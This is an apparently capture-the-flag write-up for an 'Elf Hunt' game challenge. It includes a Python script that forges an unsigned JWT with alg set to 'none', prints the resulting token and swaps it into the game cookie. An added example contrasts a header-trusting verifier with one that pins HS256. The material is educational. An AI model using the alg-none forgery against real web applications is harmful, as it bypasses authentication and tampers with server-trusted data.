Elf Hunt
Difficulty:
Direct link: Objective5.zip
Objective
Request
Piney Sappington needs a lesson in JSON web tokens. Hack Elf Hunt and score 75 points.
Piney Sappington
Hey there, friend! Piney Sappington here.
You look like someone who's good with puzzles and games.
I could really use your help with this Elf Hunt game I'm stuck on.
I think it has something to do with manipulating JWTs, but I'm a bit lost.
If you help me out, I might share some juicy secrets I've discovered.
Let's just say things around here haven't been exactly... normal.
So, what do ya say? Are you in?
Hints
JWT Secrets Revealed
Unlock the mysteries of JWTs with insights from PortSwigger's JWT Guide.
Solution
A Look at the Game
It is quickly apparent that the elves are way too fast, especially for anyone on a laptop with a trackpad for a mouse.
A Look at the JWT
Open the browser's Inspect tool, go to the Storage tab (in Firefox), copy the cookie and paste it into the decoder at jwt.io.
Encoding the Slower Speed JWT
Create a Python script that builds a new JWT with a lower speed. The header sets alg to none, so the token carries no signature.

import jwt  # PyJWT

header = {
    "alg": "none",
    "typ": "JWT"
}
payload = {
    "speed": -50
}
# Encode the JWT without a key, as the algorithm is 'none'
encoded_jwt = jwt.encode(payload, key='', algorithm="none", headers=header)
print(encoded_jwt)

Output (the part after the final dot, where the signature would go, is empty):

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzcGVlZCI6LTUwfQ.
Change the Cookie in Storage Tab of Inspector
The slower speed makes the elves easier to hit, and with a little time and aim, 75 of them go down, completing the challenge.
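The server-side view of why the unsigned cookie is accepted, and the check that rejects it, as an added example that is not part of the original write-up or the game's code. It uses only the Python standard library; the HS256 choice, the secret and the function names are assumptions made for illustration.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"  # assumption: server-side HS256 key, not from the page
# Unsigned token printed by the script above (alg "none", speed -50).
FORGED = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzcGVlZCI6LTUwfQ."


def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a token the way a server that signs its game state would."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url_encode(json.dumps(p, separators=(",", ":")).encode())
        for p in (header, payload)
    )
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(mac)}"


def verify_trusting_header(token: str, secret: bytes) -> dict:
    """Weak: lets the token's own header choose the algorithm."""
    head_b64, body_b64, _ = token.split(".")
    alg = json.loads(b64url_decode(head_b64))["alg"]
    if alg.lower() == "none":
        return json.loads(b64url_decode(body_b64))  # no integrity check at all
    return verify_pinned(token, secret)


def verify_pinned(token: str, secret: bytes) -> dict:
    """Hardened: only HS256 is accepted and the MAC must match."""
    head_b64, body_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(head_b64)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))
```

With the algorithm pinned, the forged cookie fails on the header check, and a signed token whose payload has been swapped fails on the MAC comparison.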
Response
Piney Sappington
Well done! You've brilliantly won Elf Hunt! I couldn't be more thrilled. Keep up the fine work, my friend!
What have you found there? The Captain's Journal? Yeah, he comes around a lot. You can find his comms office over at Brass Buoy Port on Steampunk Island.